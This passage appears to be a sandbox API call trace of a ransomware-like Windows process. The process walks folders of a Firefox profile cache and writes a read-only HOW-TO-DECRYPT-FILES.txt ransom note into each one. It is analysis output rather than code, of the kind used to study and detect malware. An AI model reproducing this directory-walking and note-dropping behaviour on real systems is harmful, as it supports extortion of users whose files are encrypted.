lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36", lpFilePart=0x0) returned 0x53 [0049.274] GetLastError () returned 0x12 [0049.274] SetErrorMode (uMode=0x1) returned 0x0 [0049.274] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.274] GetLastError () returned 0x12 [0049.274] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.274] GetLastError () returned 0x12 [0049.274] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.274] GetLastError () returned 0x12 [0049.274] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.274] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.274] SetErrorMode (uMode=0x0) returned 0x1 [0049.274] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36", lpFilePart=0x0) returned 0x53 [0049.274] GetLastError () returned 0x12 [0049.274] SetErrorMode (uMode=0x1) returned 0x0 [0049.275] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.275] GetLastError () returned 0x12 [0049.275] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.275] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.275] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.275] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.275] SetErrorMode (uMode=0x0) returned 0x1 [0049.275] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\F745Am01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\F745Am01", lpFilePart=0x0) returned 0x5c [0049.275] GetLastError () returned 0x12 [0049.275] SetErrorMode (uMode=0x1) returned 0x0 [0049.275] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\F745Am01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\2\\36\\f745am01"), fInfoLevelId=0x0, lpFileInformation=0x1bdc3e4 | out: lpFileInformation=0x1bdc3e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x89060920, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x89060920, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x89060920, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x669d)) returned 1 [0049.275] GetLastError () returned 0x12 [0049.275] SetErrorMode (uMode=0x0) returned 0x1 [0049.275] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.275] GetLastError () returned 0x12 [0049.275] SetErrorMode (uMode=0x1) returned 0x0 [0049.275] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\2\\36\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.276] GetLastError () returned 0x0 [0049.276] GetFileType (hFile=0x184) returned 0x1 [0049.276] SetErrorMode (uMode=0x0) returned 0x1 [0049.276] GetFileType (hFile=0x184) returned 0x1 [0049.276] WriteFile (in: hFile=0x184, lpBuffer=0x1bf7ec4*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1bf7ec4*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.277] GetLastError () returned 0x0 [0049.277] CloseHandle (hObject=0x184) returned 1 [0049.277] GetLastError () returned 0x0 [0049.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.277] GetLastError () returned 0x0 [0049.277] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\2\\36\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.277] GetLastError () returned 0x0 [0049.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3", lpFilePart=0x0) returned 0x50 [0049.277] GetLastError () returned 0x0 [0049.277] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.277] GetLastError () returned 0x0 [0049.277] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3", lpFilePart=0x0) returned 0x50 [0049.277] GetLastError () returned 0x0 [0049.277] SetErrorMode (uMode=0x1) returned 0x0 [0049.277] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.277] GetLastError () returned 0x0 [0049.277] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.277] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.278] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.278] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.278] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.278] SetErrorMode (uMode=0x0) returned 0x1 [0049.278] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3", lpFilePart=0x0) returned 0x50 [0049.278] GetLastError () returned 0x12 [0049.278] SetErrorMode (uMode=0x1) returned 0x0 [0049.278] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.278] GetLastError () returned 0x12 [0049.278] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.278] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.278] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.278] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.278] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.278] SetErrorMode (uMode=0x0) returned 0x1 [0049.278] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A", lpFilePart=0x0) returned 0x53 [0049.278] GetLastError () returned 0x12 [0049.278] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.278] GetLastError () returned 0x12 [0049.278] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A", lpFilePart=0x0) returned 0x53 [0049.278] GetLastError () returned 0x12 [0049.278] SetErrorMode (uMode=0x1) returned 0x0 [0049.278] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.279] GetLastError () returned 0x12 [0049.279] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.279] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.279] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.279] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.279] SetErrorMode (uMode=0x0) returned 0x1 [0049.279] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A", lpFilePart=0x0) returned 0x53 [0049.279] GetLastError () returned 0x12 [0049.279] SetErrorMode (uMode=0x1) returned 0x0 [0049.279] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.279] GetLastError () returned 0x12 [0049.279] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.279] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.279] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.279] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.279] SetErrorMode (uMode=0x0) returned 0x1 [0049.279] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\FC5BEd01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\FC5BEd01", lpFilePart=0x0) returned 0x5c [0049.279] GetLastError () returned 0x12 [0049.280] SetErrorMode (uMode=0x1) returned 0x0 [0049.280] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\FC5BEd01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\3\\9a\\fc5bed01"), fInfoLevelId=0x0, lpFileInformation=0x1bfcdc8 | out: lpFileInformation=0x1bfcdc8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2723350, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc2723350, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc276f610, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0xe6db)) returned 1 [0049.280] GetLastError () returned 0x12 [0049.280] SetErrorMode (uMode=0x0) returned 0x1 [0049.280] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.280] GetLastError () returned 0x12 [0049.280] SetErrorMode (uMode=0x1) returned 0x0 [0049.280] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\3\\9a\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.281] GetLastError () returned 0x0 [0049.281] GetFileType (hFile=0x184) returned 0x1 [0049.281] SetErrorMode (uMode=0x0) returned 0x1 [0049.281] GetFileType (hFile=0x184) returned 0x1 [0049.281] WriteFile (in: hFile=0x184, lpBuffer=0x1c188a8*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c188a8*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.281] GetLastError () returned 0x0 [0049.282] CloseHandle (hObject=0x184) returned 1 [0049.282] GetLastError () returned 0x0 [0049.282] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.282] GetLastError () returned 0x0 [0049.282] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\9A\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.282] GetLastError () returned 0x0 [0049.282] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA", lpFilePart=0x0) returned 0x53 [0049.282] GetLastError () returned 0x0 [0049.282] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.282] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.282] GetLastError () returned 0x0 [0049.282] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA", lpFilePart=0x0) returned 0x53 [0049.282] GetLastError () returned 0x0 [0049.282] SetErrorMode (uMode=0x1) returned 0x0 [0049.282] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.283] GetLastError () returned 0x0 [0049.283] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.283] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.283] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.283] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.283] SetErrorMode (uMode=0x0) returned 0x1 [0049.283] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA", nBufferLength=0x105, lpBuffer=0x18e578, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA", lpFilePart=0x0) returned 0x53 [0049.283] GetLastError () returned 0x12 [0049.283] SetErrorMode (uMode=0x1) returned 0x0 [0049.283] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.283] GetLastError () returned 0x12 [0049.283] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.283] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.283] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.283] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.283] SetErrorMode (uMode=0x0) returned 0x1 [0049.283] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\2555Ed01", nBufferLength=0x105, lpBuffer=0x18e62c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\2555Ed01", lpFilePart=0x0) returned 0x5c [0049.283] GetLastError () returned 0x12 [0049.284] SetErrorMode (uMode=0x1) returned 0x0 [0049.284] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\2555Ed01" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\3\\da\\2555ed01"), fInfoLevelId=0x0, lpFileInformation=0x1c1be98 | out: lpFileInformation=0x1c1be98*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc489c8b0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc489c8b0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xc489c8b0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x48b7)) returned 1 [0049.284] GetLastError () returned 0x12 [0049.284] SetErrorMode (uMode=0x0) returned 0x1 [0049.284] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.284] GetLastError () returned 0x12 [0049.284] SetErrorMode (uMode=0x1) returned 0x0 [0049.284] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\cache\\3\\da\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.284] GetLastError () returned 0x0 [0049.284] GetFileType (hFile=0x184) returned 0x1 [0049.284] SetErrorMode (uMode=0x0) returned 0x1 [0049.284] GetFileType (hFile=0x184) returned 0x1 [0049.284] WriteFile (in: hFile=0x184, lpBuffer=0x1c37bdc*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ea38, lpOverlapped=0x0 | out: lpBuffer=0x1c37bdc*, lpNumberOfBytesWritten=0x18ea38*=0x18da, lpOverlapped=0x0) returned 1 [0049.285] GetLastError () returned 0x0 [0049.285] CloseHandle (hObject=0x184) returned 1 [0049.285] GetLastError () returned 0x0 [0049.285] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x6c [0049.286] GetLastError () returned 0x0 [0049.286] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\3\\DA\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.286] GetLastError () returned 0x0 [0049.286] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4", nBufferLength=0x105, lpBuffer=0x18e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4", lpFilePart=0x0) returned 0x50 [0049.286] GetLastError () returned 0x0 [0049.286] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.286] GetLastError () returned 0x0 [0049.286] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4", lpFilePart=0x0) returned 0x50 [0049.286] GetLastError () returned 0x0 [0049.286] SetErrorMode (uMode=0x1) returned 0x0 [0049.286] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.286] GetLastError () returned 0x0 [0049.286] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.286] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.286] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.287] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.287] SetErrorMode (uMode=0x0) returned 0x1 [0049.287] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4", nBufferLength=0x105, lpBuffer=0x18e5e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4", lpFilePart=0x0) returned 0x50 [0049.287] GetLastError () returned 0x12 [0049.287] SetErrorMode (uMode=0x1) returned 0x0 [0049.287] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.287] GetLastError () returned 0x12 [0049.287] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.287] SetErrorMode (uMode=0x0) returned 0x1 [0049.287] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC", nBufferLength=0x105, lpBuffer=0x18e6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\4\\EC", lpFilePart=0x0) returned 0x53 [0049.287] GetLastError () returned 0x12 [0049.287] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e5c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.287] 